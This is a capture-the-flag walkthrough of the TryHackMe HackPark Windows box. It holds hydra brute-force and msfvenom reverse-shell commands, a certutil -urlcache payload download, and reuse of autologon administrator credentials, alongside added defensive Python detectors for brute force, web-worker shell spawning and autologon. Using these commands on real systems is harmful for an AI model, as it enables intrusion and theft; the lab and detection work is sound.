TryHackMe-Hack Park

Abdullah Rizwan | 09 : 45 PM | 30th October 2020


This is a Windows machine, so it may not respond to ping. We pass -Pn to nmap so it skips the ping host-discovery step and scans the box anyway.

nmap -Pn -sC -sV

Host is up (0.17s latency).
Not shown: 998 filtered ports
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2020-10-30T16:52:20+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


I ran a reverse image search on the clown image to find where else it appears on the internet.

That led me to a page that names the clown: Pennywise.


Here we see an /admin page; let's visit it.

We can see in the page source that this is a POST form, so the login request will be sent as a POST.


Now that we know the login form submits a POST request, let's try to brute-force it with hydra. We need a username to brute-force with; the hints provided by this room say the username is admin.

Doing it this way will give you wrong results, because the form's real field names are not UserName and Password:

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:UserName=^USER^ & Password=^PASS^&Login:Login failed"

Now launch Burp Suite, intercept a login attempt with dummy credentials, and you will get a request like this:


Build the hydra command from that request: replace %2fadmin: with /admin:, the UserName value (admin) with ^USER^, and the Password value with ^PASS^.

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=rKI96%2BsCmsHE%2BBnXdIfX2SDkfH9eXlljTdGkdGcVZvZs4wFTrEcHN8RzIiJUP3%2BmIotfzJsQcEGZkMsFWgCKCcodwrJ0SgoYW6AHLLU3Lf9eI4t0abp6pf2yQ6TIJhJb8D143UhfjmN83j2hEeECKoz5FknRAYWStUq%2FPQA%2FIuHRtaES66kLKksczFvJuU%2B5g5E0lZFLWKoiBU8kIHH%2FBJcfOZrMU4UiWe9lOS2zOwtICdeoD3%2FmgBKIVbefaQDASAS%2BEyufY0WmK%2FGQlKkKrKgw7aY5yjnjHK0qlnhWSlYirlOzmQG1OM%2BgjNLe9lh%2B0FnTKo%2B8l2yrE%2FOtmjfzo7GUHHDyy2kG3Jzb%2Fnc63sYdmpE3&__EVENTVALIDATION=TuS%2F6KtXDbAW7T9F99qLDc%2Bdn5DVR%2FFt6iHlpBIA70gHcfSj6gOvo%2BedBax4e%2Bg9AHpwy0wZr9UAz18%2FzK7qGWGOt3Qa3y0kYnv7So%2BCr7Dx%2F2hgHXmU8QEl1nZbLT%2B9X%2FYLOQfNLu6V2SMGWewSmvdqTs%2FIbIHGLoXPTljXEiu4yPSy&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V

Now give it some time while it's running.

And you will have your credentials: username admin, password 1qaz2wsx.
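From the defender's side, a hydra run like the one above is loud: the IIS W3C log fills with POSTs to /Account/login.aspx from one client, each answered with 200 (the page re-renders with "Login failed"), followed by a single 302 once a guess works. The following example is added here and is not part of the original writeup; the log lines, server address (10.10.10.5) and client addresses (10.9.1.20, 10.9.1.21) are constructed, and the threshold and window are assumptions you would tune to your own traffic.

```python
"""Spot a web-login brute force in IIS W3C log lines.

Added example for this writeup, not part of the original post. The records
are constructed to resemble what a form brute force leaves behind.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# IIS writes one space-separated record per request and replaces spaces
# inside the User-Agent with '+'. Field names come from the #Fields: line.
HEADER = ("#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
          "cs-username c-ip cs(User-Agent) sc-status time-taken")
SERVER = "10.10.10.5"     # constructed server address
ATTACKER = "10.9.1.20"    # constructed client running the brute force
USER = "10.9.1.21"        # constructed ordinary user

SAMPLE_LOG = [
    HEADER,
    f"2020-10-30 16:49:58 {SERVER} GET / - 80 - {USER} Mozilla/5.0+(Windows) 200 15",
    f"2020-10-30 16:50:02 {SERVER} POST /Account/login.aspx ReturnURL=/admin 80 - {USER} Mozilla/5.0+(Windows) 302 41",
]
# Fifteen failed guesses, one per second (200 = form re-rendered), then the
# guess that works (302 = redirect to /admin).
SAMPLE_LOG += [
    f"2020-10-30 16:50:{5 + i:02d} {SERVER} POST /Account/login.aspx ReturnURL=/admin 80 - {ATTACKER} Mozilla/5.0+(Hydra) 200 3{i % 10}"
    for i in range(15)
]
SAMPLE_LOG.append(
    f"2020-10-30 16:50:20 {SERVER} POST /Account/login.aspx ReturnURL=/admin 80 - {ATTACKER} Mozilla/5.0+(Hydra) 302 44"
)


def parse_iis(lines):
    """Yield one dict per record, keyed by the names on the #Fields: line."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def detect_login_bursts(lines, uri="/Account/login.aspx", threshold=10, window_seconds=60):
    """Return {client_ip: (max_posts_in_any_window, redirects)} for clients that
    POST to `uri` at least `threshold` times inside a sliding time window.
    A 3xx after a burst of 200s is what a successful guess looks like from
    the server's side, so the redirect count is reported alongside."""
    posts = defaultdict(list)
    redirects = defaultdict(int)
    for rec in parse_iis(lines):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != uri.lower():
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        posts[rec["c-ip"]].append(ts)
        if rec["sc-status"].startswith("3"):
            redirects[rec["c-ip"]] += 1

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = (peak, redirects[ip])
    return alerts


if __name__ == "__main__":
    for ip, (burst, hits) in detect_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {burst} login POSTs within 60s, {hits} redirect(s): possible credential brute force")
```

On the constructed sample the ordinary user (one POST) stays below the threshold while the brute-forcing client is reported with 16 POSTs in the window and one redirect. Real logs will need the threshold raised for shared NAT addresses, and the same logic applies to any login URI, not just BlogEngine's.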

You can see here that the site is running BlogEngine.NET, version 3.3.6, so the first thing I'm going to do is search for it on exploit-db.

Now edit your IP and port in this code.

Save it as PostView.ascx

Go to Posts in BlogEngine.

Set up your netcat listener

Navigate to

This shell is unstable, so we are going to upload a payload and catch it with Metasploit instead.


msfvenom -p windows/meterpreter/reverse_tcp LHOST=  LPORT=5555 -f exe > shell.exe


Launch Metasploit with msfconsole -q

Use exploit/multi/handler as the listener

Set the options to the same values used for the payload

Now transfer it through the reverse shell

python3 -m http.server 80 (on the attacking machine, to serve the file)

certutil.exe -urlcache -f shell.exe (in the reverse shell, to download it)

And it looks like we have it on the Windows box.

And just like that we have a stable reverse shell through Metasploit. Awesome!
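Two things in this chain are easy to catch with process-creation telemetry: the BlogEngine payload runs inside the IIS worker process, so w3wp.exe ends up spawning cmd.exe, and certutil is used with -urlcache to pull a file from a URL. The following triage logic is an added example, not part of the original writeup; the events are constructed in the shape of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) with placeholder PIDs, paths and a constructed IP, and the rule set is an assumption, not a vendor's.

```python
"""Triage process-creation events for a web worker spawning a shell and for
certutil used as a downloader. Added example, not part of the original post.
The events below are constructed; no real telemetry from the box is used."""
import re

# An IIS worker process (w3wp.exe) has no routine reason to launch these.
WEB_WORKERS = {"w3wp.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe"}

# certutil fetching from a URL ("-urlcache -f <url>", also seen with "-split")
# is the classic living-off-the-land download; "-decode" often follows it.
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.IGNORECASE)
CERTUTIL_DECODE = re.compile(r"certutil(\.exe)?\b.*-decode\b", re.IGNORECASE)

# Constructed sample events (placeholder PIDs, paths and IP address).
EVENTS = [
    {"ProcessId": 1201, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"ProcessId": 1202, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://10.9.1.20/shell.exe shell.exe"},
    {"ProcessId": 1203, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verifystore root"},        # legitimate certutil use
    {"ProcessId": 1204, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage_process_events(events):
    """Return [(ProcessId, [reasons])] for every event that matches a rule."""
    findings = []
    for ev in events:
        parent = basename(ev["ParentImage"])
        image = basename(ev["Image"])
        cmd = ev["CommandLine"]
        reasons = []
        if parent in WEB_WORKERS and image in SUSPICIOUS_CHILDREN:
            reasons.append(f"web worker {parent} spawned {image}")
        if CERTUTIL_DOWNLOAD.search(cmd):
            reasons.append("certutil used as a downloader")
        elif CERTUTIL_DECODE.search(cmd):
            reasons.append("certutil used to decode a payload")
        if reasons:
            findings.append((ev["ProcessId"], reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in triage_process_events(EVENTS):
        print(pid, "; ".join(reasons))
```

The parent/child rule fires on the first event and the command-line rule on the second; the benign certutil call and the notepad launch are left alone. In practice the parent/child rule is the more robust of the two, since the download tool can be swapped but the payload still has to be launched by the web server's own worker.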

You can run systeminfo in cmd:

Host Name:                 HACKPARK                                       
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User   
Registered Organization:                                                  
Product ID:                00252-70000-00000-AA886    
Original Install Date:     8/3/2019, 10:43:23 AM            
System Boot Time:          10/30/2020, 9:44:53 AM    
System Manufacturer:       Xen                                            
System Model:              HVM domU                                       
System Type:               x64-based PC          
Processor(s):              1 Processor(s) Installed.           
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz                   
BIOS Version:              Xen, 8/24/2006
Windows Directory:         C:\Windows  

Here you can find the Original Install Date.

For some reason the abnormal-service part was giving me issues, so I skipped the whole message.exe approach. Instead, winPEAS turned up something interesting: there are autologon credentials for the administrator. We know RDP on port 3389 is open, so we can use Remmina to get into the box.
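The autologon finding comes from the Winlogon registry key, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, where AutoAdminLogon=1 together with a cleartext DefaultPassword means any local user who can read HKLM (ordinary users can, by default) gets the administrator's password. The audit below is an added example, not part of the original writeup or of winPEAS; the reg query output is constructed and the password value is a placeholder, not the box's real one.

```python
"""Audit Winlogon autologon settings from `reg query` output.
Added example for this writeup, not part of the original post. The dump
below is constructed; the password data is a placeholder."""
import re

# Constructed output of:
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    HACKPARK
    DefaultUserName    REG_SZ    administrator
    DefaultPassword    REG_SZ    <placeholder-password>
    Shell    REG_SZ    explorer.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
"""

# "<indent><ValueName>   <REG_TYPE>   <data>" as printed by reg query
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")


def parse_reg_query(text):
    """Map lower-cased value name -> data for the values in reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(1).lower()] = m.group(3).strip()
    return values


def audit_autologon(values):
    """Classify the autologon configuration found in the Winlogon key.

    high   : autologon on and a cleartext DefaultPassword present
    medium : DefaultPassword left behind although autologon is off
    low    : autologon on but no password in the registry (e.g. stored as an
             LSA secret by the Sysinternals Autologon tool)
    none   : nothing to report
    """
    enabled = values.get("autoadminlogon", "0").strip() == "1"
    user = values.get("defaultusername", "")
    has_password = bool(values.get("defaultpassword"))
    if enabled and has_password:
        severity = "high"
    elif has_password:
        severity = "medium"
    elif enabled:
        severity = "low"
    else:
        severity = "none"
    return {"autologon_enabled": enabled, "user": user,
            "cleartext_password": has_password, "severity": severity}


if __name__ == "__main__":
    finding = audit_autologon(parse_reg_query(REG_OUTPUT))
    print(finding)
```

On the constructed dump the result is severity high for the user administrator, which is exactly the condition winPEAS flags. The fix on the defensive side is to remove DefaultPassword from the key and either turn autologon off or store the secret through the Sysinternals Autologon tool, which keeps it as an LSA secret rather than a world-readable registry string.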

Now we are administrator and can do pretty much anything.